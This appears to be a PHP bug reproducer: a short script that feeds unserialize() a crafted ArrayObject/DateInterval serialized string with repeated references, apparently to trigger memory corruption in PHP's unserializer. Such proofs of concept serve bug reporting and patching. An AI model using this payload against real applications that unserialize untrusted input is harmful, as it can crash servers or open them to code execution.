- unserialize: documentation ( source)
- serialize: documentation ( source)
<?php
class test
{
var $ryat;
function __wakeup()
{
// $this->ryat = 'ryat';
}
}
$inner = 'x:i:0;O:12:"DateInterval":0:{};m:a:2:{i:0;r:4;i:1;r:4;}';
$exploit = 'C:11:"ArrayObject":'.strlen($inner).':{'.$inner.'}';
$data = unserialize($exploit);
for($i = 0; $i < 5; $i++) {
$v[$i] = 'hi'.$i;
}
echo(serialize($data));